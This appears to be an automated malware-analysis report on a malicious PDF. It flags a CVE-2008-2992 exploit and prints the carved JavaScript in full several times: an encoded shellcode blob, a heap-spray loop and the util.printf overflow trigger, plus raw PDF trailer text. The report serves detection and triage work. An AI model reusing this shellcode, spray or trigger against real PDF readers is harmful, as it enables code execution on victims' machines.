MALICIOUS
Risk Score: 268
Malware Insights
MITRE ATT&CK
- T1059.001 PowerShell
- T1204.002 Malicious File
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The presence of an unescape() call and a suspicious extracted artifact named 'javascript_obj0013_001.js' suggests obfuscated code. The JavaScript is likely designed to download and execute a second-stage payload, a common technique for initial access. The confidence is moderate due to the lack of specific details on the payload's destination or execution method.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (7)
- util.printf — CVE-2008-2992 (critical; CVE exact; rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script stream: zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" + "%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Malformed active-content stream length (medium; rule PDF_MALFORMED_EXPLOIT_STREAM_LENGTH): A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (6)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x390 | 2737 bytes |

SHA-256: 6d2b1466282c843d171b24cf2b948c33a7dc3f5308ead69e657f82ce85186080
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);

| javascript_obj0013_002.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x3B2 | 3334 bytes |

SHA-256: c900c989ba38cfddb7d7282920604773f2384117bbfc0f52194fe8a6b550bf21
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF

| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x390 | 2008 bytes |

SHA-256: 6d15c264fb06e413d0707ad8968ae632ea3e8b086ee932f3a956fcb90ef7c237
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);

| generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3B2 | 2605 bytes |

SHA-256: 0467e7075159ecdbe5458d68e5491a741ee035011a7c2581cdfccf51b43649a2
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF

| generic_stage_recovery_002.js | deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0xF | 4634 bytes |

SHA-256: 01848684b8a804eb035b52928862a87423f23b913dbb6db0b64e0ec38ecf9059
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0A0A%u0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",gipW5Eb);
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000264 00000 n
0000000282 00000 n
0000000327 00000 n
0000000400 00000 n
0000000431 00000 n
0000000451 00000 n
0000000490 00000 n
0000000556 00000 n
0000000734 00000 n
0000000784 00000 n
0000000865 00000 n
0000000912 00000 n
0000006893 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
7094
%%EOF

| combined_document_js_000.js | deobfuscated-js | combined document JavaScript streams at offset 0xF | 6092 bytes |

SHA-256: 20bc4b581632348d07cb9d5a6bd4c2842369f305ed3888e6097921fc2445a4d1
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
this.lhF0pCJES29x()
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
"%u4F56%uD6BF%u5B60%uCB88%u5377%uD6AF%u446A%uE3B5" +
"%u6105%uCCA5%u4E40%uC1A9%u7305%uCBB4%u6271%uD0A4" +
"%u5760%uA2A8%u5949%uC6AD%u5F49%uD0AE%u4464%uE3B5" +
"%u4305%uCEBE%u5968%uA2A2%u6450%uE680%u416A%uCEA2" +
"%u576A%uF6A8%u706A%uCEA5%u7760%u53CC%uDBE8%u0125" +
"%u80B3%u5A37%uDBEF%u543C%uC1FD%u497B%u80E9%u5233" +
"%uCAF0%u5E7B%uCAE4%u3BD5");
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
zFHYxkRYCwD2=unescape("%uC931%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u9C13" +
"%u55AF%u833B%uFCEB%uF4E2%uBF77%u710F%u66AF%u8233" +
"%uAEA0%u0FD5%u3696%uC1B7%uAA77%uD0BD%u5063%u4BAA" +
"%u36D0%uA2CC%u525F%u926D%u3605%u29CC%u3A45%uD247" +
"%u9B19%uE247%uBD0D%u2914%u0A76%uD647%u4E1B%u51CF" +
"%u488E%uA1EC%uBDFE%uB682%uDB36%uF59A%uBD54%uA1F3" +
"%uBDFE%uC83E%u6F0B%u043F%u3E71%uFD95%uF186%uE7C8" +
"%uDFE7%uFD95%uBD5B%u2901%u1243%u61CF%uD7D4%u63CF" +
"%uFF36%u29AA%uBD0D%uBE8A%uF506%u430D%u3507%u290D" +
"%u3505%u290F%uBDFF%u213B%u38C3%u7247%u326F%u4A95" +
"%u3655%uA2CC%uF086%uF0C1%uC953%u5E9B%uBD5F%uC814" +
"%u6F04%u9F24%u3605%u21CC%u25C3%uE49A%u0885%uD74C" +
"%uB6FF%u22FA%uB55B%u8220%uEA8E%u82A6%uC956%u4E9B" +
"%u32C2%uFECF%u1864%u65A9%u3541%uDAC8%u3660%u91CC" +
"%u66C5%uF19C%u6653%uF533%uBDF9%uF210%uC956%u529B" +
"%uC955%u569B%uF636%u2760%u43C5%uF335%u6057%u5D9F" +
"%u6CD7%u0995%uD8E7%u62FF%uDEC6%u5DEA%uC9FA%uC78B" +
"%u6671%uCDBE%u7766%uC6A8%u5377%uD1BF%u7105%uD6A9" +
